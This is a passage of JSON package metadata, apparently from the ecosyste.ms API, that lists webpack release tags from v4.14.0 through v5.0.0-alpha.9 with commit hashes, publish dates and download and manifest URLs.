"html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/